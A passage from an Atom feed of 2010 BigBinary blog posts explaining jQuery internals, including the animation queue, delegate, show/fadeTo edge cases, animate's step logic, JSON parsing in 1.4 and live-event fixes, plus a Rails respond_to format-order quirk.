      <content type="html"><![CDATA[<p>Recently I tried the following code in jQuery and it did not work.</p><pre><code class="language-javascript">$(&quot;#lab&quot;).animate({ height: &quot;200px&quot; }).hide();</code></pre><p>If I pass a parameter to <code>hide</code> then it starts working.</p><pre><code class="language-javascript">$(&quot;#lab&quot;).animate({ height: &quot;200px&quot; }).hide(1);</code></pre><p>As it turns out, I did not have a proper understanding of how effects work in jQuery.</p><p>The animate method uses a queue internally. This is the queue to which all the pending activities are added.</p><pre><code class="language-javascript">$(&quot;#lab&quot;).animate({ height: &quot;200px&quot; }).animate({ width: &quot;200px&quot; });</code></pre><p>In the above code the element is being animated twice. However, the second animation will not start until the first animation is done. While the first animation is happening, the second animation is added to a queue. The name of this default queue is <code>fx</code>. This is the queue to which jQuery adds all the pending activities while one activity is in progress. You can ask an element how many pending activities there are in its queue.</p><pre><code class="language-javascript">$(&quot;#lab&quot;)
  .animate({ height: &quot;200px&quot; })
  .animate({ width: &quot;200px&quot; })
  .animate({ width: &quot;800px&quot; })
  .queue(function () {
    console.log($(this).queue(&quot;fx&quot;).length);
    $(this).dequeue();
  })
  .animate({ width: &quot;800px&quot; })
  .queue(function () {
    console.log($(this).queue(&quot;fx&quot;).length);
    $(this).dequeue();
  });</code></pre><p>In the above code the current queue is asked twice to list the number of pending activities. The first time the number of pending activities is 3, and the second time it is 1.</p><p>The show and hide methods also accept a duration. If a duration is passed then that operation is added to the queue.
If a duration is not passed, or if the duration is zero, then that operation is not added to the queue.</p><pre><code class="language-javascript">$(&quot;#lab&quot;).hide(); // this action is not added to the fx queue
$(&quot;#lab&quot;).hide(0); // this action is not added to the fx queue
$(&quot;#lab&quot;).hide(1); // this action is added to the fx queue</code></pre><h2>Coming back to the original question</h2><p>When the show or hide method is invoked without any duration, those actions are not added to the queue.</p><pre><code class="language-javascript">$(&quot;#lab&quot;).animate({ height: &quot;200px&quot; }).hide();</code></pre><p>In the above code, since the hide method is not added to the queue, both the animate and the hide methods are executed simultaneously. Hence the end result is that the element is not hidden.</p><p>It can be fixed in a number of ways. One way would be to pass a duration to the hide method.</p><pre><code class="language-javascript">$(&quot;#lab&quot;).animate({ height: &quot;200px&quot; }).hide(1);</code></pre><p>Another way to fix it would be to pass the hiding action as a callback function to the animate method.</p><pre><code class="language-javascript">$(&quot;#lab&quot;).animate({ height: &quot;200px&quot; }, function () {
  $(this).hide();
});</code></pre><p>Another way would be to explicitly put the hide method in the queue.</p><pre><code class="language-javascript">$(&quot;#lab&quot;)
  .animate({ height: &quot;200px&quot; })
  .queue(function () {
    $(this).hide();
  });</code></pre><p>Since the hide method is not added to the queue by default, in this case I have explicitly put the hide call in the queue.</p><p>Note that inside a queue method you must explicitly call <code>dequeue</code> for the next activity from the queue to be picked up.</p><pre><code class="language-javascript">$(&quot;#lab&quot;)
  .animate({ height: &quot;200px&quot; })
  .queue(function () {
    $(this).hide().dequeue();
  })
  .animate({ width: &quot;200px&quot; });</code></pre><p>In the above code, if <code>dequeue</code> is
not called then the second animation will never take place.</p><p>Also note that methods like fadeTo, fadeIn, fadeOut, slideDown, slideUp and animate are, by default, added to the default queue.</p><h2>Turning off all animations</h2><p>If for some reason you don't want animation then just set <code>$.fx.off = true</code>.</p><pre><code class="language-javascript">$.fx.off = true;

$(&quot;#lab&quot;).animate({ height: &quot;200px&quot; }, function () {
  $(this).hide();
});</code></pre><p>The above code tells jQuery to turn off all animations, and that results in the element being hidden in an instant.</p>]]></content>
    </entry><entry>
       <title><![CDATA[jQuery edge delegate method has arrived]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/jquery-edge-delegate-method-has-arrived"/>
      <updated>2010-02-02T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/jquery-edge-delegate-method-has-arrived</id>
      <content type="html"><![CDATA[<p>One of the issues with the live method is that it first searches through all the matching elements and then throws away the result.</p><pre><code class="language-javascript">$('p').live('click', function () {});</code></pre><p>In the above case jQuery does nothing with the selected <code>p</code> elements. Since the result does not really matter, it is a good idea to remove such code from the <code>document ready</code> callbacks list.</p><p>So instead of doing this</p><pre><code class="language-javascript">$(function () {
  $('p').live('click', function () {});
});</code></pre><p>just do this</p><pre><code class="language-javascript">$('p').live('click', function () {});</code></pre><h2>Going a step further</h2><p>John just landed <a href="http://github.com/jquery/jquery/commit/31432e048f879b93ffa44c39d6f5989ab2620bd8#comments">this commit which adds the delegate method</a>.</p><p>Html markup</p><pre><code class="language-html">&lt;div id=&quot;lab&quot;&gt;
  &lt;p&gt;p inside lab&lt;/p&gt;
&lt;/div&gt;
&lt;p&gt;p outside lab&lt;/p&gt;</code></pre><p>If you want to track all the clicks on p then you could write it like this.</p><pre><code class="language-javascript">$(document).delegate(&quot;p&quot;, &quot;click&quot;, function () {
  log(&quot;p was clicked&quot;);
});</code></pre><p>However, if you only want to track clicks on 'p' elements which are inside the element with id <code>lab</code> then you can write it like this.</p><pre><code class="language-javascript">$(&quot;#lab&quot;).delegate(&quot;p&quot;, &quot;click&quot;, function () {
  log(&quot;p was clicked&quot;);
});</code></pre><p>Note this functionality is in jQuery edge and is not available in jQuery 1.4.1, so you will have to get the jQuery code from github to play with it.</p><p>If you are interested in the jQuery.live vs jQuery.fn.live discussion then follow <a href="http://forum.jquery.com/topic/jquery-live-jquery-fn-live-discussion">this thread</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[jQuery show method edge case]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/jquery-show-method-edge-case"/>
      <updated>2010-01-29T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/jquery-show-method-edge-case</id>
      <content type="html"><![CDATA[<p>Here is a simple case of invoking the <code>show</code> method on a hidden element.</p><pre><code class="language-html">&lt;style&gt;
  p {
    display: inline;
  }
  #hello p {
    display: none;
  }
&lt;/style&gt;

&lt;div id=&quot;container&quot;&gt;
  &lt;div id=&quot;hello&quot;&gt;
    Hello World
    &lt;p&gt;this is p inside hello&lt;/p&gt;
  &lt;/div&gt;
&lt;/div&gt;</code></pre><p>jQuery code.</p><pre><code class="language-javascript">$(&quot;p&quot;).show();</code></pre><p>You can see the result <a href="http://jsfiddle.net/d5uW7">here</a>. Notice that when <code>p</code> is shown, the <code>display</code> property of <code>p</code> is <code>inline</code>, which is what it should be. All is well.</p><p>Now I'll change the css a little bit and will try the same code again. The new css is below.</p><pre><code class="language-html">&lt;style&gt;
  #container p {
    display: inline;
  }
  #hello p {
    display: none;
  }
&lt;/style&gt;</code></pre><p>See the result <a href="http://jsfiddle.net/qj6PT">here</a>. Notice that the <code>display</code> property of <code>p</code> is <code>block</code> instead of <code>inline</code>.</p><h2>Where did jQuery go wrong?</h2><p>jQuery did not do anything wrong. It is just being a bit lazy. I'll explain.</p><p>Since the element was hidden when jQuery was asked to display it, jQuery had no idea whether the element's display property should be <code>inline</code> or <code>block</code>. So jQuery attempts to find out the display property of the element by asking the browser what the display property should be.</p><p>jQuery first finds out the nodeName of the element. In this case the value would be <code>P</code>. Then jQuery adds a <code>P</code> element to the body and asks the browser what the display property of this newly added element is.
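</p><p>The probe can be sketched roughly like this (a simplified illustration, not jQuery's exact source; <code>defaultDisplay</code> is a hypothetical helper name):</p><pre><code class="language-javascript">function defaultDisplay(nodeName) {
  // create a throwaway element, read its computed display, then remove it
  var elem = document.createElement(nodeName);
  document.body.appendChild(elem);
  var display = window.getComputedStyle
    ? window.getComputedStyle(elem).display
    : elem.currentStyle.display; // older IE
  document.body.removeChild(elem);
  return display;
}</code></pre><p>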
Whatever the return value is, jQuery applies that value to the element that was asked to be shown.</p><p>In the first experiment, the css rule <code>p { display: inline; }</code> said that all p elements are inline. So when jQuery added a new p element to the body and asked the browser for the display property, the browser replied 'inline', and 'inline' was applied to the element. All was good.</p><p>In the second case, I changed the stylesheet to <code>#container p { display: inline; }</code>, so that only p elements under the id <code>container</code> have the inline property. So when jQuery added a p element to the body and asked for the display type, the browser correctly replied 'block'.</p><p>So what's the fix?</p><p>Find the parent element (#hello) of the element in question (p in this case). jQuery should add the new p element to #hello, and then jQuery would get the right display property.</p>]]></content>
    </entry><entry>
       <title><![CDATA[jQuery fadeTo method fades even the hidden elements]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/jquery-fadeto-method-fades-even-the-hidden-elements"/>
      <updated>2010-01-29T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/jquery-fadeto-method-fades-even-the-hidden-elements</id>
      <content type="html"><![CDATA[<p><em>The following code has been tested with jQuery 1.4.1. Code demo links are at the end of the blog.</em></p><p>The <a href="http://api.jquery.com/fadeTo">fadeTo</a> method of jQuery, strangely, fades even the hidden elements.</p><p>Here is the html markup.</p><pre><code class="language-html">&lt;style&gt;
  #hello p {
    display: none;
  }
&lt;/style&gt;
&lt;div id=&quot;hello&quot;&gt;
  &lt;p&gt;this is p inside hello&lt;/p&gt;
&lt;/div&gt;
&lt;p&gt;This is p outside hello&lt;/p&gt;</code></pre><p>Since the first <code>p</code> is hidden, you will see only one <code>p</code> element in the browser. Now execute the following jQuery code.</p><pre><code class="language-javascript">$('p').fadeTo('slow', 0.5);</code></pre><p>You will see both the <code>p</code> elements.</p><p>jQuery goes out of its way to make sure that hidden elements are visible. Here is the <code>fadeTo</code> method.</p><pre><code class="language-javascript">fadeTo: function( speed, to, callback ) {
  return this.filter(&quot;:hidden&quot;).css(&quot;opacity&quot;, 0).show().end()
    .animate({opacity: to}, speed, callback);
}</code></pre><p>Also notice that for a hidden element the fadeTo operation starts with an opacity of zero and fades up, while visible elements fade down from their current opacity towards the target.</p><p>Check out the same demo in slow motion and notice that while the first p element emerges out of hiding, the other p element is slowly fading. This might cause an unwanted effect, so watch out for this one.</p><ul><li><a href="http://jsfiddle.net/DPWSQ">First Demo</a></li><li><a href="http://jsfiddle.net/6gaEQ">Second Demo</a></li><li><a href="http://jsfiddle.net/sLwx5">Third Demo</a></li></ul>]]></content>
    </entry><entry>
       <title><![CDATA[Order of format matters in respond_to block]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/order-of-format-matters-in-respond_to-block"/>
      <updated>2010-01-25T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/order-of-format-matters-in-respond_to-block</id>
      <content type="html"><![CDATA[<p>This is standard Rails code. I am using Rails 2.3.5.</p><pre><code class="language-ruby">class UsersController &lt; ApplicationController
  def index
    @users = User.all
    respond_to do |format|
      format.html
      format.js  { render :json =&gt; @users }
    end
  end
end</code></pre><p>Accidentally, in one of my controllers the order of formats got reversed. The altered code looks like this.</p><pre><code class="language-ruby">class UsersController &lt; ApplicationController
  def index
    @users = User.all
    respond_to do |format|
      format.js  { render :json =&gt; @users }
      format.html
    end
  end
end</code></pre><p>I thought the order of format declaration does not matter. I was wrong.</p><pre><code class="language-plaintext">&gt; curl -I http://localhost:3000/users
HTTP/1.1 200 OK
Connection: close
Date: Mon, 25 Jan 2010 22:32:16 GMT
ETag: &quot;d751713988987e9331980363e24189ce&quot;
Content-Type: text/javascript; charset=utf-8
X-Runtime: 62
Content-Length: 2
Cache-Control: private, max-age=0, must-revalidate</code></pre><p>Notice that the Content-Type in the response header is <strong>text/javascript</strong> instead of <strong>text/html</strong>. curl sends <code>Accept: */*</code>, so Rails falls back to the first format declared in the <code>respond_to</code> block.</p><p>Well, I guess the order of format matters. I hope it is fixed in Rails 3.</p>]]></content>
    </entry><entry>
       <title><![CDATA[How animate really works in jQuery]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/how-animate-really-works-in-jquery-simple-animation-case-discussed"/>
      <updated>2010-01-25T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/how-animate-really-works-in-jquery-simple-animation-case-discussed</id>
      <content type="html"><![CDATA[<p>jQuery has the <a href="http://api.jquery.com/animate">animate method</a>, which is just awesome. Today I looked into the jQuery source code to see exactly how animate works.</p><p>I will take a simple case of animating a <code>div</code> from a height of <code>34</code> to <code>100</code>.</p><p>Here is the test case.</p><pre><code class="language-javascript">$(function () {
  $(&quot;#lab&quot;).css({ background: &quot;yellow&quot;, height: &quot;34px&quot;, margin: &quot;10px&quot; });
  $(&quot;a&quot;).click(function () {
    $(&quot;#lab&quot;).animate({ height: &quot;100&quot; });
    return false;
  });
});</code></pre><p>The html markup is:</p><pre><code class="language-html">&lt;a href=&quot;&quot;&gt;click me&lt;/a&gt;
&lt;div id=&quot;lab&quot;&gt;Hello World&lt;/div&gt;</code></pre><p>Inside <code>animate</code>, an fx object is created for each property.</p><pre><code class="language-javascript">jQuery.each( prop, function( name, val ) {
  var e = new jQuery.fx( self, opt, name );
});</code></pre><p>Calling new on jQuery.fx returns a JavaScript object instance.</p><pre><code class="language-javascript">fx: function( elem, options, prop ) {
  this.options = options;
  this.elem = elem;
  this.prop = prop;

  if ( !options.orig ) {
    options.orig = {};
  }
}</code></pre><p>Next in the animate method is a call to <code>e.custom</code>.</p><pre><code class="language-javascript">start = 34;
end = 100;
unit = &quot;px&quot;;
e.custom(start, end, unit);</code></pre><p>The start, end and unit values are gleaned from the current state of the div.</p><p>Here is the custom method.</p><pre><code class="language-javascript">custom: function( from, to, unit ) {
  this.startTime = now();
  this.start = from;
  this.end = to;
  this.unit = unit || this.unit || &quot;px&quot;;
  this.now = this.start;
  this.pos = this.state = 0;

  var self = this;
  function t( gotoEnd ) {
    return self.step(gotoEnd);
  }

  t.elem = this.elem;

  if ( t() &amp;&amp; jQuery.timers.push(t) &amp;&amp; !timerId ) {
    timerId = setInterval(jQuery.fx.tick, 13);
  }
},</code></pre><p>As you can see, every 13 milliseconds a call to the <code>step</code> method is made.</p><p>The <code>step</code> method is where the real calculation is done. Here is the code.</p><pre><code class="language-javascript">step: function( gotoEnd ) {
  var t = now();
  var n = t - this.startTime;

  this.state = n / this.options.duration;
  this.pos = jQuery.easing['swing'](this.state, n, 0, 1, this.options.duration);
  this.now = this.start + ((this.end - this.start) * this.pos);
  this.update();
}</code></pre><p><code>this.startTime</code> is the time when <code>animate</code> was invoked. The <code>step</code> method is called periodically from the custom method, so the value of <code>t</code> is constantly changing. Based on the value of <code>t</code>, the value of <code>n</code> will change. Some of the values of <code>n</code> I got were 1, 39, 69, 376 and 387.</p><p>While invoking the animate method I did not specify a speed, so jQuery picked up the default speed of 400. In this case the value of this.options.duration is <code>400</code>. The value of state changes in each run, and it would be something along the lines of 0.0025, 0.09, 0.265, 0.915 and 0.945.</p><p>If you don't know what easing is then you should read <a href="http://www.learningjquery.com/2009/02/quick-tip-add-easing-to-your-animations">this article</a> by Brandon Aaron. Since I did not specify an easing option, jQuery picks up <code>swing</code> easing.</p><p>In order to get the value of the next position, this easing algorithm needs state, n and duration. Once these are supplied, <code>pos</code> is derived. The value of <code>pos</code> over the period of the animation would change and be something like 0, 0.019853157161528467, 0.04927244144387716, 0.9730426794137726, 0.9973960708808632.</p><p>Based on the value of <code>pos</code>, the value of <code>now</code> is derived. 
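</p><p>The arithmetic of a single step can be checked in isolation. The following is an illustrative recomputation, not jQuery's code; it uses the <code>swing</code> formula from jQuery's easing table and the interpolation line from <code>step</code> above.</p><pre><code class="language-javascript">var start = 34;
var end = 100;

// swing easing: maps state in [0, 1] to a position in [0, 1]
function swing(state) {
  return 0.5 - Math.cos(state * Math.PI) / 2;
}

// halfway through the default 400 ms animation, state is 0.5
var pos = swing(0.5);                  // approximately 0.5
var now = start + (end - start) * pos; // approximately 67

// at the end of the animation state is 1, so now lands on end
start + (end - start) * swing(1);      // approximately 100
</code></pre><p>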
Then the <code>update</code> method is called to update the screen.</p><p>The <code>update</code> method has the following code, which invokes the <code>_default</code> method.</p><pre><code class="language-javascript">(jQuery.fx.step._default)( this );</code></pre><p>The <code>_default</code> method has the following code, which finally updates the element.</p><pre><code class="language-javascript">fx.elem.style[fx.prop] = Math.max(0, fx.now);</code></pre><p>The fx.now value was set in the custom method, and here that value is actually applied to the element.</p><p>You will have a much better understanding of how animate works if you look at the source code. I just wanted to know at a high level what's going on, and these are my findings.</p>]]></content>
    </entry><entry>
       <title><![CDATA[JSON parsing natively in jQuery 1.4 and updates]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/handling-json-parsing-natively-in-jquery-1-4-and-what-changed-from-jquery-1-3"/>
      <updated>2010-01-15T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/handling-json-parsing-natively-in-jquery-1-4-and-what-changed-from-jquery-1-3</id>
      <content type="html"><![CDATA[<p>With the popularity of JavaScript, JSON has become very popular. <a href="http://www.json.org">JSON</a>, which stands for <code>JavaScript Object Notation</code>, is a popular way to send and receive data between browser and server.</p><p>jQuery makes it extremely easy to deal with JSON data. In the example below, the server sends a success message to the browser. The JSON data looks like this.</p><pre><code class="language-text">{ 'success': 'record was successfully updated' }</code></pre><p>The jQuery code to handle the JSON data looks like this.</p><pre><code class="language-javascript">$.ajax({
  type: &quot;GET&quot;,
  url: &quot;test.js&quot;,
  dataType: &quot;json&quot;,
  success: function (json) {
    $(&quot;#result&quot;).text(json.success);
  },
});</code></pre><p>It all looks good, and the code works with jQuery 1.3.</p><p>However, if you upgrade to jQuery 1.4 the above code will stop working. Why? jQuery 1.4 does strict JSON parsing using the native parse method, and any malformed JSON structure will be rejected.</p><h2>How jQuery 1.3 parses JSON structure</h2><p>jQuery 1.3 uses JavaScript's eval to evaluate the incoming JSON structure. Open Firebug and type the following example.</p><pre><code class="language-javascript">s = &quot; { 'success' :  'record was updated' } &quot;;
result = eval(&quot;(&quot; + s + &quot;)&quot;);
console.log(result);</code></pre><p>You will get a valid output.</p><p>Note that any valid JSON structure is also valid JavaScript code, so eval converts a valid JSON structure into a JavaScript object. However, non-JSON structures can also be converted into JavaScript objects.</p><p>The JSON specification says that all string values must use double quotes. Single quotes are not allowed. 
What this means is that the following structures are not valid JSON.</p><pre><code class="language-text">{ 'foo' : 'bar' }
{ foo: 'bar' }
{ foo: &quot;bar&quot; }
{ &quot;foo&quot; : 'bar' }</code></pre><p>Even though the above strings are not valid JSON, if you eval them they will produce a valid JavaScript object. Since jQuery 1.3 uses eval on strings to convert a JSON structure to a JavaScript object, all the above-mentioned examples work.</p><p>However, they will not work if you upgrade to jQuery 1.4.</p><h2>jQuery 1.4 uses native JSON parsing</h2><p>Using eval to convert JSON into a JavaScript object has a few issues. The first is security: it is possible that eval could execute some malicious code. Secondly, it is not as fast as the native parse methods made available by browsers. However, browsers adhere to the JSON spec and will not parse malformed JSON structures. Open Firebug and try the following code to see how native browser methods refuse to parse a malformed JSON structure. Here is the link to the announcement of <a href="http://blog.mozilla.com/webdev/2009/02/12/native-json-in-firefox-31">Firefox support for native JSON parsing</a>. John Resig mentioned the need for jQuery to have native JSON parsing support <a href="http://ejohn.org/blog/native-json-support-is-required/#postcomment">here</a>.</p><pre><code class="language-javascript">s = &quot; { 'success' :  'record was updated' } &quot;;
result = eval(&quot;(&quot; + s + &quot;)&quot;);
console.log(result); /* returns valid JavaScript object */

result2 = window.JSON.parse(s);
console.log(result2); /* throws error */</code></pre><p>As you can see, a string which was successfully parsed by <code>eval</code> was rejected by <code>window.JSON.parse</code>. It might or might not fail in Chrome. 
More on that later. Since jQuery 1.4 relies on the browser to parse the JSON structure, malformed JSON structures will fail.</p><p>In order to ensure that JSON is correctly parsed by the browsers, jQuery does some cleanup to make sure that you are not trying to pass something malicious. You will not be able to test this directly using Firebug, but if you make an AJAX request and send a response from the server, you can verify the following.</p><p>The following JSON structure will be correctly parsed in jQuery 1.3. However, the same JSON structure will fail in jQuery 1.4. Why? Because of the dangling open bracket <code>[</code>.</p><pre><code class="language-javascript">'[ { &quot;error&quot; : &quot;record was updated&quot; }';</code></pre><p>jQuery 1.4 has the following code that does some data cleanup, to get around the security issue with JSON parsing, before sending that data to the browser for parsing. Here is a snippet of the code.</p><pre><code class="language-javascript">// Make sure the incoming data is actual JSON
// Logic borrowed from http://json.org/json2.js
if (/^[\],:{}\s]*$/.test(data.replace(/\\(?:[&quot;\\\/bfnrt]|u[0-9a-fA-F]{4})/g, &quot;@&quot;)
    .replace(/&quot;[^&quot;\\\n\r]*&quot;|true|false|null|-?\d+(?:\.\d*)?(?:[eE][+\-]?\d+)?/g, &quot;]&quot;)
    .replace(/(?:^|:|,)(?:\s*\[)+/g, &quot;&quot;)))</code></pre><h2>Not all browsers parse JSON the same way</h2><p>Earlier I mentioned that the following JSON structure will not be correctly parsed by browsers.</p><pre><code class="language-text"> { 'a':1 } </code></pre><p>All browsers will fail to parse the above JSON structure except <code>Chrome</code>. 
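</p><p>You can verify the strictness of a native parser in any modern JavaScript engine. The check below is illustrative; <code>JSON.stringify</code> is used only to build a spec-compliant double-quoted string for comparison.</p><pre><code class="language-javascript">// a single-quoted structure, which the JSON spec forbids
var malformed = ' { \'a\': 1 } ';

var rejected = false;
try {
  JSON.parse(malformed);
} catch (e) {
  rejected = true;   // strict native parsers throw on single quotes
}

// the same data serialized by the engine itself is valid JSON
var valid = JSON.stringify({ a: 1 });  // a double-quoted JSON string
JSON.parse(valid).a;                   // 1
</code></pre><p>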
Look at the blog titled <a href="http://dbj.org/dbj/?p=470">Cross Browser JSON parsing</a> to get more insight into this issue.</p><h2>I have malformed JSON and I want to use jQuery 1.4</h2><p>If you have malformed JSON and you want to use jQuery 1.4, then you should set the dataType to <code>text</code> and convert the returned JSON structure using eval. Here is one way you can do that.</p><pre><code class="language-javascript">$.ajax({
  url: &quot;/url&quot;,
  dataType: &quot;text&quot;,
  success: function (data) {
    json = eval(&quot;(&quot; + data + &quot;)&quot;);
    // do something with json
  },
});</code></pre><p><a href="http://benalman.com">Ben Alman</a> suggested another way in the <a href="http://yehudakatz.com/2010/01/15/jquery-1-4-and-malformed-json">comment section</a>.</p><pre><code class="language-text">/* this should be the very first JavaScript inclusion file */
&lt;script type=&quot;text/javascript&quot; language=&quot;javascript&quot;&gt;
  window.JSON = null;
&lt;/script&gt;</code></pre><p>jQuery attempts to parse JSON natively. However, if native JSON parsing is not available, it falls back to <code>eval</code>. Here, by setting <code>window.JSON</code> to null, the browser is faking that it does not support native JSON parsing.</p><p>Here are the <a href="http://github.com/jquery/jquery/commit/90a87c03b4943d75c24bc5e6246630231d12d933">two</a> <a href="http://github.com/jquery/jquery/commit/44e6beb10304789044de2c5a58f5bb82e8321636">commits</a> which made most of the changes in the way parsing is done.</p><p>Use <a href="http://www.jsonlint.com">JSONLint</a> if you want to play with various strings to see which ones are valid JSON and which are not.</p>]]></content>
    </entry><entry>
       <title><![CDATA[How jQuery 1.4 fixed rest of live methods]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/how-jquery-1-4-fixed-rest-of-live-methods"/>
      <updated>2010-01-14T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/how-jquery-1-4-fixed-rest-of-live-methods</id>
      <content type="html"><![CDATA[<p>If you look at the jQuery 1.3 documentation for the <code>live</code> method, you will notice that the live method is not supported for the following events: blur, focus, mouseenter, mouseleave, change and submit.</p><p>jQuery 1.4 fixed them all.</p><p>In this article I am going to discuss how jQuery 1.4 brought support for these events. If you want a little background on what the <code>live</code> method is and how it works, then you should read <a href="how-live-method-works-in-jquery-why-it-does-not-work-in-some-cases-when-to-use-livequery">this article</a> which I wrote some time back.</p><h2>focus and blur events</h2><p>IE and other browsers do not bubble <code>focus</code> and <code>blur</code> events, and that is in compliance with the W3C event model. As per the <a href="http://www.w3.org/TR/DOM-Level-2-Events/events.html#Events-eventgroupings-htmlevents-h3">spec</a>, the focus and blur events do not bubble.</p><p>However, the spec also mentions two additional events called <code>DOMFocusIn</code> and <code>DOMFocusOut</code>. As per the <a href="http://www.w3.org/TR/DOM-Level-2-Events/events.html#Events-Event-initUIEvent">spec</a>, these two events should bubble. Firefox and other browsers implemented DOMFocusIn/DOMFocusOut. However, IE implemented <code>focusin</code> and <code>focusout</code>, and IE made sure that these two events do bubble up.</p><p>The jQuery team decided to pick the shorter names and introduced two new events: <code>focusin</code> and <code>focusout</code>. These two events bubble and hence they can be used with the live method. <a href="http://github.com/jquery/jquery/commit/03481a52c72e417b01cfeb499f26738cf5ed5839">This commit</a> makes focusin/focusout work with the live method. 
Here is the code snippet.</p><pre><code class="language-javascript">if (document.addEventListener) {
  jQuery.each({ focus: &quot;focusin&quot;, blur: &quot;focusout&quot; }, function (orig, fix) {
    jQuery.event.special[fix] = {
      setup: function () {
        this.addEventListener(orig, handler, true);
      },
      teardown: function () {
        this.removeEventListener(orig, handler, true);
      },
    };

    function handler(e) {
      e = jQuery.event.fix(e);
      e.type = fix;
      return jQuery.event.handle.call(this, e);
    }
  });
}</code></pre><p>Once again, make sure that you are using <code>focusin/focusout</code> instead of <code>focus/blur</code> with <code>live</code>.</p><h2>mouseenter and mouseleave events</h2><p><code>mouseenter</code> and <code>mouseleave</code> events do not bubble in IE. However, <code>mouseover</code> and <code>mouseout</code> do bubble in IE. If you are not sure what the difference is between <code>mouseenter</code> and <code>mouseover</code>, then <a href="http://www.bennadel.com/blog/1805-jQuery-Events-MouseOver-MouseOut-vs-MouseEnter-MouseLeave.htm">watch this excellent</a> screencast by Ben.</p><p>The fix that was applied for <code>focusin</code> can be replicated here to fix the <code>mouseenter</code> and <code>mouseleave</code> issue. <a href="http://github.com/jquery/jquery/commit/d251809912c06478fd0c7711736ef6ea3572723e">This is the commit</a> that fixed the mouseenter and mouseleave issue with the live method.</p><pre><code class="language-javascript">jQuery.each(
  {
    mouseenter: &quot;mouseover&quot;,
    mouseleave: &quot;mouseout&quot;,
  },
  function (orig, fix) {
    jQuery.event.special[orig] = {
      setup: function (data) {
        jQuery.event.add(
          this,
          fix,
          data &amp;&amp; data.selector ? delegate : withinElement,
          orig
        );
      },
      teardown: function (data) {
        jQuery.event.remove(
          this,
          fix,
          data &amp;&amp; data.selector ? delegate : withinElement
        );
      },
    };
  });</code></pre><h2>Event detection</h2><p>Two more events are left to be handled: submit and change. Before jQuery applies a fix for these two events, it needs a way to detect whether a browser allows submit and change events to bubble. The jQuery team does not favor browser sniffing, so how does one detect event support without browser sniffing?</p><p>Juriy Zaytsev posted an excellent blog titled <a href="http://perfectionkills.com/detecting-event-support-without-browser-sniffing">Detecting event support without browser sniffing</a>. Here is the short and concise way he proposes to find out if an event is supported by a browser.</p><pre><code class="language-javascript">var isEventSupported = (function () {
  var TAGNAMES = {
    select: &quot;input&quot;,
    change: &quot;input&quot;,
    submit: &quot;form&quot;,
    reset: &quot;form&quot;,
    error: &quot;img&quot;,
    load: &quot;img&quot;,
    abort: &quot;img&quot;,
  };

  function isEventSupported(eventName) {
    var el = document.createElement(TAGNAMES[eventName] || &quot;div&quot;);
    eventName = &quot;on&quot; + eventName;
    var isSupported = eventName in el;
    if (!isSupported) {
      el.setAttribute(eventName, &quot;return;&quot;);
      isSupported = typeof el[eventName] == &quot;function&quot;;
    }
    el = null;
    return isSupported;
  }

  return isEventSupported;
})();</code></pre><p>In the comments section, John Resig mentioned that this technique can also be used to find out whether an event bubbles or not.</p><p>John committed the following code to jQuery.</p><pre><code class="language-javascript">var eventSupported = function (eventName) {
  var el = document.createElement(&quot;div&quot;);
  eventName = &quot;on&quot; + eventName;
  var isSupported = eventName in el;
  if (!isSupported) {
    el.setAttribute(eventName, &quot;return;&quot;);
    isSupported = typeof el[eventName] === &quot;function&quot;;
  }
  el = null;
  return isSupported;
};

jQuery.support.submitBubbles = eventSupported(&quot;submit&quot;);
jQuery.support.changeBubbles = eventSupported(&quot;change&quot;);</code></pre><p>The next task is to actually make a change event or submit event bubble if, based on the above code, it is determined that the browser does not bubble those events.</p><h2>Making the change event bubble</h2><p>On a form a person can change many things, including checkboxes, radio buttons, select menus, textareas etc. The jQuery team implemented a full-blown change tracker which detects every single change on the form and acts accordingly.</p><p>Radio button, checkbox and select changes are detected via the click event. Here is the code.</p><pre><code class="language-javascript">click: function( e ) {
  var elem = e.target, type = elem.type;
  if ( type === &quot;radio&quot; || type === &quot;checkbox&quot; || elem.nodeName.toLowerCase() === &quot;select&quot; ) {
    return testChange.call( this, e );
  }
},</code></pre><p>In order to detect changes on other fields like input fields, textareas etc., the <code>keydown</code> event is used. Here is the code.</p><pre><code class="language-javascript">keydown: function( e ) {
  var elem = e.target, type = elem.type;
  if ( (e.keyCode === 13 &amp;&amp; elem.nodeName.toLowerCase() !== &quot;textarea&quot;) ||
      (e.keyCode === 32 &amp;&amp; (type === &quot;checkbox&quot; || type === &quot;radio&quot;)) ||
      type === &quot;select-multiple&quot; ) {
    return testChange.call( this, e );
  }
},</code></pre><p>IE has a proprietary event called <code>beforeactivate</code> which gets fired before any change happens. This event is used to store the existing value of the field. After the click or keydown event the changed value is captured. Then these two values are compared to see if a change has really happened. 
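</p><p>The store-then-compare idea itself is independent of the DOM. Here is a small illustrative sketch (the names are mine, not jQuery's): remember a field's value when interaction starts, and report a change only if the value differs afterwards.</p><pre><code class="language-javascript">function makeChangeTracker() {
  var stored = {};   // maps field name to the last stored value
  return {
    // called when interaction starts (beforeactivate in IE): store the value
    before: function (field) {
      stored[field.name] = field.value;
    },
    // called after click or keydown: did the value really change?
    after: function (field) {
      var changed = stored[field.name] !== field.value;
      stored[field.name] = field.value;
      return changed;
    }
  };
}

var tracker = makeChangeTracker();
var field = { name: 'city', value: 'Pune' };

tracker.before(field);
field.value = 'Mumbai';
tracker.after(field);   // true: the value really changed

tracker.before(field);
tracker.after(field);   // false: no change, so no change event
</code></pre><p>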
Here is the code for detecting the change.</p><pre><code class="language-javascript">function testChange(e) {
  var elem = e.target,
    data,
    val;

  if (!formElems.test(elem.nodeName) || elem.readOnly) {
    return;
  }

